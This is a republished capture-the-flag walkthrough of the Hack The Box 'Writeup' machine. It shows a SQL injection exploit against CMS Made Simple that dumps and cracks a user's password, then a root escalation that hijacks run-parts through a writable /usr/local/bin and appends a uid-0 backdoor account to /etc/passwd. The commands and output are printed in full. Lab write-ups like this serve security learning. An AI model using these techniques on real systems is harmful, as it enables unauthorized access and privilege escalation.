Hack The Box - Writeup
source link: https://www.tuicool.com/articles/YrieMvb
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
My write-up / walkthrough for Writeup from Hack The Box.
Quick Summary
Hey guys, today writeup retired and here’s my write-up about it. It was a very nice box and I enjoyed it. It’s a Linux box and its ip is 10.10.10.138
, I added it to /etc/hosts
as writeup.htb
. Let’s jump right in !
Nmap
As always we will start with nmap
to scan for open ports and services :
root@kali:~/Desktop/HTB/boxes/writeup# nmap -sV -sT -sC -o nmapinitial writeup.htb Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-11 16:03 EET Nmap scan report for writeup.htb (10.10.10.138) Host is up (0.14s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA) |_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/writeup/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Nothing here yet. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds
We got http
on port 80 and ssh
on port 22. On port 80 nmap
found /robots.txt
with a disallowed entry for /writeup
.
Web Enumeration
http://writeup.htb
The index page says that the website is not ready yet, it also says that there’s a dos protection script so we won’t bruteforce anything.
Let’s check /writeup
:
/writeup
is the write-ups page and as the index page said, it’s still not ready yet and that’s why it was disallowed in robots.txt
.
I checked wappalyzer
’s results and saw that it’s using a cms
called CMS Made Simple
:
Without wappalyzer
we can still identify that by looking at the source of the page :
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
SQLi, User Flag
I searched for exploits for CMS Made Simple
, and because the version was from 2019 ( Copyright (C) 2004-2019
) I searched only for exploits in 2019.
I found this sql injection exploit so I gave it a try.
I set the time to 3
:
TIME = 3
Then I ran the exploit :
root@kali:~/Desktop/HTB/boxes/writeup# python 46635.py -u http://writeup.htb/writeup/ --crack -w /usr/share/wordlists/rockyou.txt [+] Salt for password found: 5a599ef579066807 [+] Username found: jkr [+] Email found: [email protected] [+] Password found: 62def4866937f08cc13bab43bb14e6f7 [+] Password cracked: raykayjay9
Now we can ssh
into the box as jkr : raykayjay9
:
We owned user.
Hijacking run-parts, Root Flag
I downloaded pspy32
on the box and ran it to monitor the processes, I noticed the following :
2019/10/11 10:35:58 CMD: UID=0 PID=2279 | sshd: [accepted] 2019/10/11 10:35:58 CMD: UID=102 PID=2280 | sshd: [net] 2019/10/11 10:36:00 CMD: UID=0 PID=2281 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2019/10/11 10:36:00 CMD: UID=0 PID=2282 | run-parts --lsbsysinit /etc/update-motd.d 2019/10/11 10:36:00 CMD: UID=0 PID=2283 | /bin/sh /etc/update-motd.d/10-uname 2019/10/11 10:36:00 CMD: UID=0 PID=2284 | /bin/sh /etc/update-motd.d/10-uname 2019/10/11 10:36:00 CMD: UID=0 PID=2285 | sshd: jkr [priv]
Every successful ssh
login :
sshd: [accepted] sshd: [net]
These commands get executed :
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new run-parts --lsbsysinit /etc/update-motd.d /bin/sh /etc/update-motd.d/10-uname /bin/sh /etc/update-motd.d/10-uname
When I checked jkr
’s groups I saw that jkr
was in a group called staff
:
jkr@writeup:/tmp$ id uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
And staff
members could write to /usr/local/bin
:
jkr@writeup:/tmp$ find / -group staff 2>/dev/null /var/local /usr/local /usr/local/bin /usr/local/include /usr/local/share /usr/local/share/sgml /usr/local/share/sgml/misc /usr/local/share/sgml/stylesheet /usr/local/share/sgml/entities /usr/local/share/sgml/dtd /usr/local/share/sgml/declaration /usr/local/share/fonts /usr/local/share/man /usr/local/share/emacs /usr/local/share/emacs/site-lisp /usr/local/share/xml /usr/local/share/xml/schema /usr/local/share/xml/misc /usr/local/share/xml/entities /usr/local/share/xml/declaration /usr/local/games /usr/local/man /usr/local/src /usr/local/etc /usr/local/lib /usr/local/lib/python3.5 /usr/local/lib/python3.5/dist-packages /usr/local/lib/python2.7 /usr/local/lib/python2.7/dist-packages /usr/local/lib/python2.7/site-packages /usr/local/sbin
By default run-parts
was in /bin
:
jkr@writeup:/tmp$ which run-parts /bin/run-parts
But if we take a look at the env
command that sets the path every ssh
login we’ll see that /usr/bin/local
is before /usr/bin
:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Which means that we can put an executable of our choice in /usr/local/bin
and call it run-parts
, then ssh
into the box again and our fake run-parts
will be executed as root.
I wrote a bash script that echoes :
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
to /etc/passwd
which will add a new user rooot : AAAA
with uid
0. (same from theprevious post)
jkr@writeup:/usr/local/bin$ nano run-parts jkr@writeup:/usr/local/bin$ chmod +x run-parts jkr@writeup:/usr/local/bin$ cat run-parts #!/bin/bash echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd jkr@writeup:/usr/local/bin$ which run-parts /usr/local/bin/run-parts jkr@writeup:/usr/local/bin$
Then I started a new ssh
session and the script was successfully executed :
root@kali:~/Desktop/HTB/boxes/writeup# ssh [email protected] [email protected]'s password: The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Oct 11 10:48:16 2019 from 10.10.xx.xx jkr@writeup:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false messagebus:x:101:104::/var/run/dbus:/bin/false sshd:x:102:65534::/run/sshd:/usr/sbin/nologin jkr:x:1000:1000:jkr,,,:/home/jkr:/bin/bash mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash jkr@writeup:~$ su rooot Password: root@writeup:/home/jkr# whoami root
And We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read theprevious write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.
Previous Hack The Box write-up :Hack The Box - Ghoul
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK